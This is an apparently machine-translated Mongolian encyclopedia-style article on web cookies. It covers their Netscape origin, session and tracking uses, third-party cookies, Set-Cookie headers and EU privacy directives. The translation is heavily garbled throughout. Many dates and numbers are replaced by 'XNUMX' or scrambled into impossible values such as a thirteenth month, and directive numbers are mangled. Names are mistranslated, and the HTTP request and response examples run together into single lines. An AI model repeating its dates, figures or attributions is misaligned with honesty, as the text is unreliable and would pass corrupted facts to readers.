Интернет күүки: Энэ юу вэ? Тодорхойлолт, гарал үүсэл, төрөл, нууцлал

Un күүки эсвэл вэб күүки (эсвэл жигнэмэг, гэж товчилсон гэрч Квебект) нь HTTP холбооны протоколоор тодорхойлогддог бөгөөд энэ нь HTTP серверээс HTTP клиент рүү илгээсэн мэдээллийн дарааллаар тодорхойлогддог бөгөөд энэ нь тодорхой нөхцлөөр ижил HTTP серверээс асуух бүрт буцаж ирдэг.

Күүки нь a-тай тэнцүү байна терминал дээр хадгалагдсан жижиг текст файл интернет хэрэглэгчийн. 20 гаруй жилийн турш үйл ажиллагаагаа явуулж байгаа тэдгээр нь вэб сайт хөгжүүлэгчдэд чиглэлтийг хөнгөвчлөхийн тулд хэрэглэгчийн мэдээллийг хадгалах, зарим функцийг зөвшөөрөх боломжийг олгодог. Күүки нь гуравдагч этгээдэд ашиглагдаж болзошгүй хувийн үлдэгдэл мэдээллийг агуулж байдаг тул үргэлж маргаантай байсаар ирсэн.

Энэ нь вэб серверээс вэб хөтөч рүү HTTP толгой хэлбэрээр илгээгддэг бөгөөд энэ нь серверт хандах бүрт өөрчлөгдөөгүй буцаадаг. Күүки ашиглаж болно баталгаажуулалт, сесс (улсын засвар үйлчилгээ), болон төлөө хэрэглэгчийн тухай тодорхой мэдээллийг хадгалахсайтын сонголт эсвэл цахим сагсанд агуулагдах зүйлс гэх мэт. Күүки гэдэг нэр томъёо нь үүнээс гаралтай шидэт жигнэмэг, UNIX тооцоололд алдартай ойлголт бөгөөд энэ нь хөтчийн күүкийн санаа, нэрийг бий болгосон. Күүкийн хэд хэдэн хувилбарууд байдаг бөгөөд тус бүр нь өөрийн хэрэглээ, давуу болон сул талуудтай.

Энгийн текст файл учраас күүки нь ажиллах боломжгүй. Тэд биш тагнуулын програм, вирус ч биш, Хэдийгээр зарим сайтын күүкиг олон тооны вирусны эсрэг программ хангамжууд илрүүлдэг, учир нь тэд олон сайтад зочлох үед хэрэглэгчдийг хянах боломжийг олгодог. 

Ихэнх орчин үеийн хөтчүүд хэрэглэгчдэд ийм боломжийг олгодог күүкиг хүлээн авах эсвэл татгалзах эсэхээ шийднэ. Хэрэглэгчид ч боломжтой күүки хэр удаан хадгалагдахыг сонгох. Гэсэн хэдий ч күүкиг бүрэн татгалзсан нь зарим сайтыг ашиглах боломжгүй болгодог. Жишээлбэл, итгэмжлэл (хэрэглэгчийн нэр, нууц үг) ашиглан нэвтрэх шаардлагатай дэлгүүрийн тэрэг эсвэл сайтуудыг хадгалах.

Historique

Нэр томъёо жигнэмэг англи хэллэгээс гаралтай шидэт жигнэмэг, энэ нь программ хүлээн авч өөрчлөгдөөгүй буцаах өгөгдлийн багц юм. Мэдээллийн технологийн салбарт күүки аль хэдийн ашиглагдаж байсан Лу Монтулли вэб харилцаанд ашиглах санаа төрсөн зургадугаар сард 1994. Тухайн үед тэрээр Netscape Communications компанид ажилладаг байсан бөгөөд энэ компани нь үйлчлүүлэгчдээ зориулж цахим худалдааны программ зохиожээ. Күүки нь дэлгүүрийн виртуал сагсыг хэрэгжүүлэх найдвартай байдлын асуудлыг шийдэж өгсөн.

Жон Гианандреа, Лу Монтулли нар тэр жилдээ Netscape-ийн анхны жигнэмэгийн тодорхойлолтыг бичсэн. 0.9 оны 13-р сарын 1994-нд гарсан Mosaic Netscape-ийн XNUMX бета хувилбар, нэгдсэн жигнэмэгийн технологи (бичлэгийг үзнэ үү). Эхний (туршилтын бус) күүки ашиглах нь Netscape вэб сайтад зочилсон хүмүүс өмнө нь энэ сайтад зочилж байсан эсэхийг тодорхойлох явдал байв. Монтулли 1995 онд күүки технологийн патентын өргөдөл гаргасан бөгөөд АНУ-ын 5774670 патентыг олгосон. 1998 онд олгосон.

0.9 онд Netscape 1994 бета хувилбарт хэрэгжсэний дараа күүкиг 2 оны 1995-р сард гаргасан Internet Explorer XNUMX-т нэгтгэсэн.

Күүкийг нэвтрүүлэх нь олон нийтэд хараахан төдийлөн мэдэгдээгүй байна. Ялангуяа күүки нь хөтчийн тохиргоонд анхдагчаар хүлээн зөвшөөрөгдөж, хэрэглэгчдэд тэдний байгаа талаар мэдэгдээгүй. Зарим хүмүүс жигнэмэг байдгийг 1995 оны эхний улиралд мэддэг байсан ч 12 оны 1996-р сарын 1996-нд Financial Times сонин нийтлэгдсэний дараа л олон нийт жигнэмэг байдаг. Учир нь хувийн нууцад халдсан байж болзошгүй. Жигнэмэгийн сэдвийг 1997, XNUMX онд Америкийн Холбооны Худалдааны Комиссын хоёр зөвлөлдөх уулзалтаар хэлэлцсэн.

Албан ёсны жигнэмэгийн тодорхойлолтыг боловсруулах ажил аль хэдийн явагдаж байсан. Албан ёсны тодорхойлолтын анхны хэлэлцүүлгийг 1995 оны 1996-р сард www-talk захидлын жагсаалтад хийсэн. IETF-ийн тусгай ажлын хэсэг байгуулагдсан. HTTP гүйлгээний төлөвийг нэвтрүүлэх хоёр өөр саналыг Брайн Бэлендорф, Дэвид Кристол нар тус тус санал болгосон боловч Кристол өөрөө тэргүүтэй бүлэг Netscape-ийн тодорхойлолтыг эхлэлийн цэг болгон ашиглахаар шийджээ. XNUMX оны XNUMX-р сард ажлын хэсэг гуравдагч этгээдийн күүки нь хувийн нууцад ихээхэн аюул учруулж байгааг тогтоосон. Бүлгийн үйлдвэрлэсэн тодорхойлолтыг эцэст нь нийтэлсэн RFC 2109.

2014 оны сүүлээс эхлэн бид олон сайт дээр күүкиний тухай баннерыг харж байна. Үүнийг зөвшөөрдөг дор хаяж нэг хөтөчийн өргөтгөл байдаг баннер харагдахгүй байна.

Күүкийн төрөл ба хэрэглээ

Сеанс менежмент

Күүки нь навигацийн явцад хэрэглэгчийн өгөгдлийг хадгалахад ашиглагдахаас гадна олон удаа зочилсон үед ч ашиглаж болно. Хэрэглэгч цахим дэлгүүр хэсэх үедээ худалдан авахыг хүссэн зүйлээ цуглуулах боломжтой виртуал төхөөрөмж болох цахим худалдааны тэргэнцрийг хэрэгжүүлэх хэрэгслээр хангах зорилгоор күүкийг нэвтрүүлсэн.

Өнөө үед дэлгүүрийн тэрэг гэх мэт програмууд сервер дээрх мэдээллийн санд байгаа зүйлсийн жагсаалтыг хадгалах нь илүү дээр юм; Тэднийг күүки дотроо хадгалахаас илүү. Вэб сервер нь өвөрмөц сешн ID агуулсан күүки илгээдэг. Дараа нь вэб хөтөч нь дараагийн хүсэлт бүрт энэ сесс ID-г буцаадаг бөгөөд сагсанд байгаа зүйлс хадгалагдаж, ижил өвөрмөц сесс ID-тай холбогддог.

Күүки байнга ашиглах нь итгэмжлэл ашиглан сайт руу нэвтрэхэд тустай. Товчхондоо, вэб сервер эхлээд өвөрмөц сешн ID агуулсан күүкийг илгээдэг. Дараа нь хэрэглэгчид итгэмжлэлээ (ихэвчлэн хэрэглэгчийн нэр, нууц үг) өгдөг. Дараа нь вэб програм нь сессийг баталгаажуулж, хэрэглэгчдэд үйлчилгээнд хандах боломжийг олгоно.

хувийн

Күүки нь тухайн сайтын хэрэглэгчийн талаарх мэдээллийг санаж, ирээдүйд түүнд тохирох контентыг харуулахын тулд ашиглаж болно. Жишээлбэл, вэб сервер нь тухайн вэб сайтад нэвтрэхэд ашигласан сүүлийн хэрэглэгчийн нэрийг агуулсан күүки илгээх боломжтой бөгөөд ингэснээр цаашид зочлохдоо хэрэглэгчийн нэрийг урьдчилан бөглөх боломжтой.

Олон вэбсайтууд хэрэглэгчийн тохиргоонд үндэслэн күүки ашигладаг. Хэрэглэгчид өөрсдийн сонголтоо маягтаар сонгоод серверт илгээнэ. Сервер нь күүки дэх тохиргоог кодлож, хөтөч рүү буцааж илгээдэг. Дараа нь, хэрэглэгч энэ сайтын хуудсанд хандах бүрд хөтөч нь күүки, улмаар тохиргооны жагсаалтыг буцаадаг; сервер дараа нь хэрэглэгчийн сонголтын дагуу хуудсыг өөрчлөх боломжтой. Жишээлбэл, Википедиа вэб сайт нь хэрэглэгчиддээ хүссэн сайтынхаа арьсыг сонгох боломжийг олгодог. Google хайлтын систем нь хэрэглэгчиддээ (бүртгүүлээгүй байсан ч) үр дүнгийн хуудас бүр дээр харахыг хүссэн үр дүнгийн тоог сонгох боломжийг олгодог.

Хяналт

Tracking cookie-г интернет хэрэглэгчдийн хайлтын зуршлыг хянахад ашигладаг. Үүнийг мөн хуудасны хүсэлт гаргах компьютерийн IP хаягийг ашиглах эсвэл үйлчлүүлэгчийн хүсэлт болгонд илгээдэг 'referrer' HTTP толгойг ашиглан хийж болох боловч күүки нь илүү нарийвчлалтай болгох боломжийг олгодог. Үүнийг дараах жишээн дээрх шиг хийж болно.

1. Хэрэв хэрэглэгч сайт дээрх хуудсыг дуудаж, хүсэлтэд күүки агуулаагүй бол сервер энэ нь хэрэглэгчийн зочилсон эхний хуудас гэж үздэг. Дараа нь сервер санамсаргүй мөр үүсгэж, хүссэн хуудасны хамт хөтөч рүү илгээдэг.
2. Энэ мөчөөс эхлэн сайтын шинэ хуудас руу залгах бүрт күүки хөтөч автоматаар илгээгдэх болно. Сервер нь хуудсыг ердийнхөөрөө илгээх боловч дуудагдсан хуудасны URL, хүсэлтийн огноо, цаг, күүки зэргийг бүртгэлийн файлд бүртгэх болно.

Бүртгэлийн файлыг харснаар хэрэглэгч ямар хуудсууд, ямар дарааллаар зочилсныг харах боломжтой. Жишээлбэл, хэрэв файл нь id=abc күүки ашиглан хийсэн цөөн хэдэн хүсэлтийг агуулж байвал эдгээр бүх хүсэлтийг нэг хэрэглэгчээс ирүүлсэн болохыг тогтоож болно. Хүссэн URL, хүсэлттэй холбоотой огноо, цаг нь хэрэглэгчийн хайлтыг хянах боломжийг олгодог.

Доор тайлбарласан гуравдагч талын күүки болон вэб дохионууд нь өөр өөр сайтуудыг хянах боломжийг олгодог. Нэг сайтын хяналтыг ерөнхийдөө статистикийн зорилгоор ашигладаг. Үүний эсрэгээр, гуравдагч этгээдийн күүки ашиглан янз бүрийн сайтуудыг хянах нь ихэвчлэн зар сурталчилгааны компаниуд нэргүй хэрэглэгчийн профайл үүсгэхэд ашиглагддаг (дараа нь хэрэглэгчдэд ямар зар сурталчилгаа үзүүлэх ёстойг тодорхойлох, мөн эдгээр зар сурталчилгаанд тохирох имэйлийг илгээхэд ашигладаг — SPAM ).

Күүкийг хянах нь хэрэглэгчийн хувийн нууцад халдах эрсдэлтэй боловч тэдгээрийг амархан устгаж болно. Ихэнх орчин үеийн хөтчүүд програмыг хаах үед байнгын күүкиг автоматаар устгах сонголтыг агуулдаг.

Гуравдагч талын күүки

Вэб хуудсанд байгаа зураг болон бусад объектууд нь тухайн хуудсыг байршуулж байгаа серверээс өөр сервер дээр байрлаж болно. Хуудсыг харуулахын тулд хөтөч эдгээр бүх объектыг татаж авдаг. Ихэнх вэбсайтууд өөр өөр эх сурвалжаас авсан мэдээллийг агуулдаг. Жишээлбэл, хэрэв та хөтөч дээрээ www.example.com гэж бичвэл хуудасны зарим хэсэгт өөр өөр эх сурвалжаас, жишээлбэл, www. .example.com-оос өөр домэйноос ирсэн объект эсвэл сурталчилгаа байх болно. "Нэгдүгээр" талын күүки нь хөтчийн хаягийн мөрөнд жагсаасан домайнаар тохируулагдсан күүки юм. Гуравдагч талын күүкиг өөр домэйноос ирсэн хуудасны объектуудын аль нэгээр нь тохируулдаг.

Өгөгдмөл байдлаар, Mozilla Firefox, Microsoft Internet Explorer, Opera зэрэг хөтчүүд гуравдагч талын күүкиг хүлээн авдаг боловч хэрэглэгчид тэдгээрийг блоклохын тулд хөтчийн тохиргооны тохиргоог өөрчлөх боломжтой. Вэб функцийг идэвхжүүлдэг гуравдагч этгээдийн күүки нь аюулгүй байдлын эрсдэлгүй боловч хэрэглэгчдийг хянахад ашигладаг. сайтаас сайт руу.

Google Chrome зэрэг бүх хөтчүүдэд ашиглах боломжтой Ghostery зэрэг хэрэгслүүд нь гуравдагч талын солилцоог хааж болно.

Хэрэгжилт

Күүки нь вэб серверээс хөтөч рүү илгээсэн жижиг өгөгдлийн хэсэг юм. Хөтөч нь сервер рүү өөрчлөгдөөгүй буцааж, төлөвийг (өнгөрсөн үйл явдлуудын санах ой) харьяалалгүй HTTP гүйлгээнд оруулдаг. Күүки байхгүй бол вэб хуудас эсвэл вэб хуудасны бүрэлдэхүүн хэсэг бүрийг татаж авах нь нэг сайт руу илгээсэн бусад хүсэлтээс үл хамааран тусгаарлагдсан үйл явдал юм. Веб серверээр тохируулахаас гадна күүкиг хөтчөөс дэмжиж, зөвшөөрвөл JavaScript зэрэг скрипт хэлээр тохируулж болно.

Албан ёсны күүкиний тодорхойлолт нь хөтчүүд хамгийн бага тооны күүки хадгалж, дахин илгээх боломжтой байх ёстойг харуулж байна. Тодруулбал, хөтөч нь дор хаяж дөрвөн килобайт хэмжээтэй 300 күүки, нэг сервер эсвэл домэйнд 20-оос доошгүй күүки хадгалах боломжтой байх ёстой.

3.1-ийн дагуу RFC 2965, жигнэмэгийн нэр том жижиг үсгийг харгалздаггүй.

Күүки нь дуусах огноог зааж өгч болох бөгөөд энэ тохиолдолд күүки энэ өдөр устах болно. Хэрэв күүки нь дуусах хугацааг заагаагүй бол хэрэглэгч хөтчөөсөө гармагц күүки устгагдана. Тиймээс, хүчинтэй байх хугацааг зааж өгөх нь күүкиг олон сешнээр дамжуулан хадгалах арга юм. Энэ шалтгааны улмаас хугацаа нь дууссан жигнэмэг гэж нэрлэгддэг тууштай. Жишээ програм: жижиглэнгийн худалдааны сайт нь хэрэглэгчдийн сагсанд байрлуулсан зүйлсийг бүртгэхийн тулд байнгын күүки ашиглаж болно (бодит байдал дээр күүки нь таны компьютерт биш, харин борлуулалтын сайт дээрх мэдээллийн санд хадгалагдсан оруулгатай холбоотой байж болно) . Ингэснээр хэрэглэгчид худалдан авалт хийлгүй хөтчөөсөө гарч, дараа нь буцаж очвол сагсанд байгаа бараагаа дахин олох боломжтой болно. Хэрэв эдгээр күүки нь хүчинтэй байх хугацааг заагаагүй бол хөтөч хаагдсан үед хүчинтэй байх бөгөөд сагсанд агуулагдах мэдээлэл устах болно.

Күүки нь тэдгээрийг үүсгэсэн сервер дээрх тодорхой домэйн, дэд домайн эсвэл замд хамрах хүрээгээр хязгаарлагдаж болно.

Күүки үүсгэх

Вэб хуудсуудыг дамжуулах нь HyperText Transfer Protocol (HTTP) ашиглан хийгддэг. Күүкиг үл тоомсорлон хөтчүүд вэб серверээс хуудас руу залгаж, ерөнхийдөө богино хэмжээний текст илгээдэг HTTP хүсэлт. Жишээлбэл, www.example.org/index.html хуудсанд хандахын тулд хөтчүүд www.example.org серверт холбогдож дараахтай төстэй хүсэлт илгээдэг.

	GET /index.html HTTP/1.1 Host: www.example.org
навигацийн	→	сервер

Сервер нь хүссэн хуудасны өмнө ижил төстэй текстийг илгээж, бүхэлд нь дууддаг HTTP хариу. Энэ пакет нь хөтчөөс күүкиг хадгалах заавар бүхий мөрүүдийг агуулж болно:

	HTTP/1.1 200 OKКонтентын төрөл: текст/htmlSet-күүки: нэр=утга (HTML хуудас)
навигацийн	←	сервер

Хэрэв сервер нь хөтчөөс күүки хадгалахыг хүсвэл сервер зөвхөн Set-Cookie мөрийг илгээдэг. Set-Cookie нь хөтчөөс name=value мөрийг хадгалж, серверт ирэх бүх хүсэлтэд буцааж өгөх хүсэлт юм. Хөтөч нь күүки дэмждэг бөгөөд хөтчийн сонголтууд дээр күүкиг идэвхжүүлсэн бол ижил серверт илгээсэн дараагийн бүх хүсэлтэд күүкийг оруулах болно. Жишээлбэл, хөтөч нь www.example.org/news.html хуудас руу залгаж, www.example.org сервер рүү дараах хүсэлтийг илгээдэг:

	АВАХ /news.html HTTP/1.1Хост: www.example.orgCookie: нэр=valueХүлээн авах: */*
навигацийн	→	сервер

Энэ нь ижил серверийн өөр хуудасны хүсэлт бөгөөд өмнө нь серверээс хөтөч рүү илгээсэн мөрийг агуулж байгаа тул дээрх эхнийхээс ялгаатай юм. Энэ хэрэгслийн ачаар сервер энэ хүсэлтийг өмнөхтэй нь холбосон гэдгийг мэддэг. Сервер нь дуудсан хуудсыг илгээх, мөн өөр күүкиг нэмэх замаар хариу үйлдэл үзүүлдэг.

Күүкиний утгыг сервер дуудсан хуудасны хариуд Set-Cookie: name=new_value гэсэн шинэ мөрийг илгээснээр өөрчилж болно. Дараа нь хөтөч хуучин утгыг шинэ утгаар солино.

Set-Cookie мөрийг ихэвчлэн HTTP серверээр бус CGI программ эсвэл өөр скрипт хэлээр үүсгэнэ. HTTP сервер (жишээ нь: Apache) нь зөвхөн програмын үр дүнг (күүки агуулсан толгойн өмнө бичигдсэн баримт бичиг) хөтөч рүү дамжуулах болно.

Күүкийг JavaScript эсвэл хөтөч дээр ажилладаг бусад ижил төстэй хэлээр тохируулж болно, тухайлбал серверийн тал дээр биш харин үйлчлүүлэгч тал дээр. JavaScript-д энэ зорилгоор document.cookie объектыг ашигладаг. Жишээлбэл, document.cookie = "temperature=20" мэдэгдэл нь "температур" нэртэй, 20 утгатай күүки үүсгэдэг.

Күүкийн шинж чанарууд

Нэр/утга хосоос гадна күүки нь дуусах хугацаа, зам, домэйн нэр болон холбогдох холболтын төрлийг агуулж болно, өөрөөр хэлбэл ердийн эсвэл шифрлэгдсэн. RFC 2965 нь күүки нь заавал хувилбарын дугаартай байх ёстойг тодорхойлсон боловч үүнийг ерөнхийдөө орхигдуулдаг. Эдгээр өгөгдлийн хэсгүүд нь нэр=шинэ_утга хосыг дагаж, цэг таслалаар тусгаарлагдана. Жишээлбэл, сервер нь Set-Cookie мөрийг илгээснээр күүки үүсгэж болно: нэр=шинэ_утга; дуусах=огноо; зам =/; домэйн=.example.org.

Күүкиний хугацаа дууссан

Күүкийн хугацаа дуусч, дараах тохиолдолд хөтөч сервер рүү илгээхгүй.

• Хөтөч хаагдсан үед, хэрэв күүки тогтвортой биш бол.
• Күүкийн хугацаа дуусах үед.
• Күүки дуусах хугацааг (сервер эсвэл скриптээр) өнгөрсөн огноо болгон өөрчлөх үед.
• Хөтөч хэрэглэгчийн хүсэлтээр күүки устгах үед.

Гурав дахь нөхцөл байдал нь сервер эсвэл скриптүүдэд күүкийг тодорхой устгах боломжийг олгодог. Google Chrome вэб хөтчийн тусламжтайгаар агуулгын тохиргоонд нэвтэрч тодорхой күүки дуусах хугацааг мэдэх боломжтой гэдгийг анхаарна уу. Компьютер дээр хадгалсан күүкийг устгах арга хэмжээ авахгүй бол хэдэн арван жилийн турш хадгалагдах болно.

Стереотипүүд

Интернетэд тавигдсанаас хойш жигнэмэгийн тухай олон санаа интернет болон хэвлэл мэдээллийн хэрэгслээр тархсан. 1998 онд АНУ-ын Эрчим хүчний яамны компьютерийн ослын хяналтын баг болох CIAC нь күүкийн аюулгүй байдлын эмзэг байдал "үндсэндээ байхгүй" болохыг тогтоож, "таны зочилсон эх сурвалж болон таны зочилсон вэб хуудасны дэлгэрэнгүй мэдээлэл" гэж тайлбарлав. вэб серверүүдийн бүртгэлийн файлд аль хэдийн байдаг." 2005 онд Бархасбадь судалгаа судалгаанд оролцогчдын багагүй хувь нь дараах мэдэгдлүүдийг авч үзсэн судалгааны үр дүнг нийтэлжээ.

• Күүки нь адилхан вирус, тэд хэрэглэгчдийн хатуу дискийг халдварладаг.
• Күүки үүсгэдэг гарч ирэх.
• Күүкийг илгээхэд ашигладаг спам.
• Күүкийг зөвхөн сурталчилгаанд ашигладаг.

Күүки нь хэрэглэгчийн компьютерээс мэдээллийг устгах эсвэл унших боломжгүй. Гэсэн хэдий ч күүки нь тухайн сайт эсвэл сайтуудын багц дээр хэрэглэгчийн зочилсон вэб хуудсыг илрүүлэх боломжийг олгодог. Энэ мэдээллийг гуравдагч этгээдэд ашиглах эсвэл дахин худалдах боломжтой хэрэглэгчийн профайлд цуглуулж, нууцлалын ноцтой асуудал үүсгэж болно. Зарим профайл нь хувийн мэдээлэл агуулаагүй гэсэн утгаараа нэргүй байдаг ч ийм профайл хүртэл эргэлзээтэй байж болно.

Үүнтэй ижил судалгаагаар интернет хэрэглэгчдийн ихэнх хувь нь күүкийг хэрхэн устгахаа мэдэхгүй байна. Хүмүүс күүкид итгэхгүй байгаагийн нэг шалтгаан нь зарим сайтууд күүкигийн хувийн шинж чанарыг урвуулан ашиглаж, энэ мэдээллийг бусад эх сурвалжтай хуваалцсан явдал юм. Зорилтот зар сурталчилгаа болон спам гэж тооцогдох хүсээгүй имэйлийн ихэнх хувь нь күүки хянах явцад олж авсан мэдээллээс ирдэг.

Хөтөчийн тохиргоо

Ихэнх хөтчүүд күүкийг дэмждэг бөгөөд хэрэглэгчдэд тэдгээрийг идэвхгүй болгохыг зөвшөөрдөг. Хамгийн түгээмэл сонголтууд нь:

• Күүкийг бүрмөсөн идэвхжүүлж эсвэл идэвхгүй болгосноор тэдгээрийг байнга хүлээн зөвшөөрч эсвэл блоклодог.
• Хөтчийн хаягийн мөрөнд javascript: alert(document.cookie) гэж оруулснаар хэрэглэгч тухайн хуудсан дээрх идэвхтэй күүкиг харахыг зөвшөөрнө үү. Зарим хөтчүүд нь хэрэглэгчдэд зориулсан күүки менежерийг агуулж байдаг бөгөөд энэ нь хөтөч дээр хадгалагдаж байгаа күүкиг сонгож устгах боломжтой байдаг.

Ихэнх хөтөч нь күүки агуулсан хувийн мэдээллийг бүрэн устгахыг зөвшөөрдөг. Күүки зөвшөөрлийг хянах нэмэлт модулиуд бас байдаг.

Нууцлал ба гуравдагч этгээдийн күүки

Энэхүү зохиомол жишээн дээр зар сурталчилгааны компани хоёр вэбсайт дээр баннер байрлуулсан байна. Зар сурталчилгааны компани нь сервер дээрээ баннер байршуулж, гуравдагч этгээдийн күүки ашигласнаар эдгээр хоёр сайтаар дамжуулан хэрэглэгчийн навигацийг хянах боломжтой.

Күүки нь вэб хэрэглэгчдийн нууцлал, нэрээ нууцлахад чухал нөлөө үзүүлдэг. Хэдийгээр күүки нь зөвхөн тэдгээрийг тохируулсан сервер рүү эсвэл ижил интернет домэйнд харьяалагддаг сервер рүү буцаан илгээгддэг ч вэб хуудас нь бусад домэйнд хамаарах серверт хадгалагдсан зураг эсвэл бусад бүрэлдэхүүн хэсгүүдийг агуулж болно. Эдгээр гадны бүрэлдэхүүн хэсгүүдийг сэргээх явцад тохируулсан күүки гэж нэрлэдэг гуравдагч талын күүки. Үүнд хүсээгүй цонхны күүки багтана.

Зар сурталчилгааны компаниуд гуравдагч этгээдийн күүки ашиглан хэрэглэгчдийг зочилдог өөр өөр сайтуудаар хянадаг. Ялангуяа зар сурталчилгааны компани нь сурталчилгааны зураг эсвэл хяналтын пикселийг байрлуулсан бүх хуудсууд дээр хэрэглэгчийг хянах боломжтой. Хэрэглэгчийн зочилсон хуудсуудын талаархи мэдлэг нь зар сурталчилгааны компанид хэрэглэгчийн сурталчилгааны тохиргоонд чиглүүлэх боломжийг олгодог.

Хэрэглэгчийн профайлыг бий болгох чадварыг зарим хүмүүс хувийн нууцад халдсан гэж үздэг, ялангуяа гуравдагч талын күүки ашиглан өөр өөр домэйн дээр мөрдөх үед. Энэ шалтгааны улмаас зарим улс орнууд күүкийн тухай хуультай байдаг.

2000 онд Цагаан ордны Мансууруулах бодисын бодлогын алба цахимаар хар тамхины сурталчилгаа үзэж буй хэрэглэгчдийн компьютерийг хянахын тулд күүки ашиглаж байсныг илрүүлсний дараа АНУ-ын засгийн газар жигнэмэг байрлуулах хатуу дүрэм журам хэрэгжүүлжээ. 2002 онд хувийн нууцын төлөө тэмцэгч Даниел Брандт Тагнуулын төв газар өөрийн вэбсайтад зочилсон компьютерт байнга күүки үлдээдгийг олж мэдсэн. Энэхүү зөрчлийн талаар мэдээлсний дараа ТТГ эдгээр күүкиг санаатайгаар илгээгээгүй гэж мэдэгдэж, тэдгээрийг байрлуулахаа больсон. 25 оны 2005-р сарын XNUMX-нд Брандт Үндэсний аюулгүй байдлын агентлаг (NSA) програм хангамжийн шинэчлэлтийн улмаас зочдын компьютер дээр хоёр байнгын күүки үлдээсэн болохыг олж мэдэв. Мэдэгдэл хүлээн авсны дараа NSA күүкийг шууд идэвхгүй болгосон.

Их Британид, The Күүки хууль ", 25 оны 2012-р сарын XNUMX-ны өдөр хүчин төгөлдөр болсон нь сайтуудад өөрсдийн зорилгыг тунхаглахыг үүрэг болгосноор хэрэглэгчид интернетэд өөрсдийнхөө ул мөр үлдээх эсэхээ сонгох боломжийг олгодог. Ингэснээр тэд зар сурталчилгааны зорилтот байдлаас хамгаалагдах боломжтой. Гэсэн хэдий ч, дагуу Асран хамгаалагч, Интернет хэрэглэгчдийн зөвшөөрөл нь тодорхой байх албагүй; хэрэглэгчийн зөвшөөрлийн нөхцлүүдэд өөрчлөлт оруулж, үүнийг хийх ийм утгатай.

Нууцлалын тухай 2002/58 дугаар заавар

Нууцлал ба цахим харилцаа холбооны 202/58 заавар нь күүки ашиглах дүрмийг агуулдаг. Тодруулбал, энэхүү удирдамжийн 5 дугаар зүйлийн 3 дахь хэсэгт хэрэглэгчийн компьютерт өгөгдөл (күүки гэх мэт) хадгалах нь зөвхөн дараах тохиолдолд л хийгдэхийг шаарддаг.

• өгөгдлийг хэрхэн ашиглаж байгаа талаар хэрэглэгч мэдээлэх;
• Энэ хадгалалтын үйл ажиллагаанаас татгалзах сонголтыг хэрэглэгчдэд олгоно. Гэхдээ энэ зүйлд мөн техникийн шалтгаанаар мэдээлэл хадгалах нь энэ хуулиас чөлөөлөгдөнө гэж заасан.

2003 оны 2004-р сараас хэрэгжиж эхэлсэн тул XNUMX оны XNUMX-р сарын тайланд дурдсанаар уг удирдамж маш дутуу хэрэгжиж, зарим гишүүн орнууд (Словак, Латви, Грек, Бельги, Люксембург) хууль тогтоомжийг хараахан шилжүүлээгүй байгааг онцолсон байна. дотоодын хууль тогтоомжид заасан заавар.

29 оны G2010-ийн саналын дагуу, зан үйлийн зар сурталчилгааны зорилгоор күүки ашиглахыг онцгойлон заасан энэхүү удирдамж нь интернет хэрэглэгчийн тодорхой зөвшөөрөл дээр маш муу хэрэгжсэн хэвээр байна. Үнэн хэрэгтээ ихэнх сайтууд зааврыг дагаж мөрддөггүй арга замаар "күүки"-ийн хэрэглээний талаар мэдээлэл өгөхгүйгээр, "техникийн" күүкиг ялгахгүйгээр энгийн "баннер"-аар хязгаарладаг. "Мөшгөх" күүки, мөн техникийн күүки (сагсны удирдлагын күүки гэх мэт) хадгалахыг хүссэн хэрэглэгчдэд бодит сонголт санал болгох, мөн "хөшөөх" күүкиг татгалзах. Үнэн хэрэгтээ, күүки ашиглахаас татгалзсан тохиолдолд олон сайтууд зөв ажиллахгүй бөгөөд энэ нь 2002/58 заавар эсвэл 95/46 (Хувийн мэдээллийг хамгаалах) заавартай нийцэхгүй байна.

2009/136/CE заавар

Энэ материалыг 2009 оны 136-р сарын 25-ны өдрийн 2009/95/EC тоот удирдамжаар шинэчилсэн бөгөөд үүнд "Захиалагч эсвэл хэрэглэгчийн терминалын төхөөрөмжид мэдээлэл хадгалах, эсвэл аль хэдийн хадгалагдсан мэдээлэлд хандах эрхийг авахыг зөвхөн дараах тохиолдолд зөвшөөрнө" гэж заасан. Захиалагч эсвэл хэрэглэгч нь 46/XNUMX/EC удирдамжийн дагуу боловсруулалтын зорилгын талаар тодорхой, бүрэн мэдээлэл хүлээн авсны дараа зөвшөөрөл өгсөн. Тиймээс шинэ заавар нь интернет хэрэглэгчийн компьютер дээр күүки байрлуулахаас өмнө хүлээх үүргийг чангатгасан.

Удирдамжийн урьдчилсан дүгнэлтэд Европын хууль тогтоогч: "Техникийн хувьд боломжтой бөгөөд үр дүнтэй бол 95/46/EC удирдамжийн холбогдох заалтын дагуу боловсруулалтын талаарх хэрэглэгчийн зөвшөөрлийг дараах байдлаар илэрхийлж болно. хөтөч эсвэл бусад програмын тохирох тохиргоог ашиглах." Гэвч үнэн хэрэгтээ өнөөг хүртэл ямар ч хөтөч хэрэглэгчийн сонголтод үлдээх ёстой техникийн чухал күүкиг нэмэлт зүйлээс салгах боломжгүй байна.

Энэхүү шинэ удирдамжийг Бельгийн парламентын гишүүд 2012 оны 2014-р сард шилжүүлсэн. XNUMX оны судалгаагаар УИХ-ын гишүүд хүртэл хэрэглэх гэж хэцүү байдгийг харуулж байна. удирдамжийн хязгаарлалт.

P3P

P3P тодорхойлолт нь сервер ямар төрлийн мэдээлэл, ямар зорилгоор цуглуулдаг болохыг тодорхойлдог нууцлалын бодлогыг тодорхойлох чадварыг агуулдаг. Эдгээр бодлогод күүки ашиглан цуглуулсан мэдээллийг ашиглах (гэхдээ үүгээр хязгаарлагдахгүй) орно. P3P-ийн тодорхойлолтын дагуу хөтөч нь нууцлалын бодлогыг хэрэглэгчийн сонголттой харьцуулах эсвэл серверээс зарласан нууцлалын бодлогын нууцлалын мэдэгдлийг танилцуулах замаар күүкиг хүлээн авах эсвэл татгалзах боломжтой.

Apple Safari болон Microsoft Internet Explorer-ийн 6 ба 7-р хувилбар зэрэг олон хөтчүүд P3P-г дэмждэг бөгөөд энэ нь хөтөч нь гуравдагч талын күүки хадгалах эсэхийг тодорхойлох боломжийг олгодог. Opera хөтөч нь хэрэглэгчдэд гуравдагч этгээдийн күүки ашиглахаас татгалзаж, интернетийн домэйнд зориулсан дэлхийн болон тусгай хамгаалалтын профайлыг үүсгэх боломжийг олгодог. Mozilla Firefox-ын 2-р хувилбар нь P3P-ийн дэмжлэгийг хассан боловч 3-р хувилбар дээр сэргээсэн.

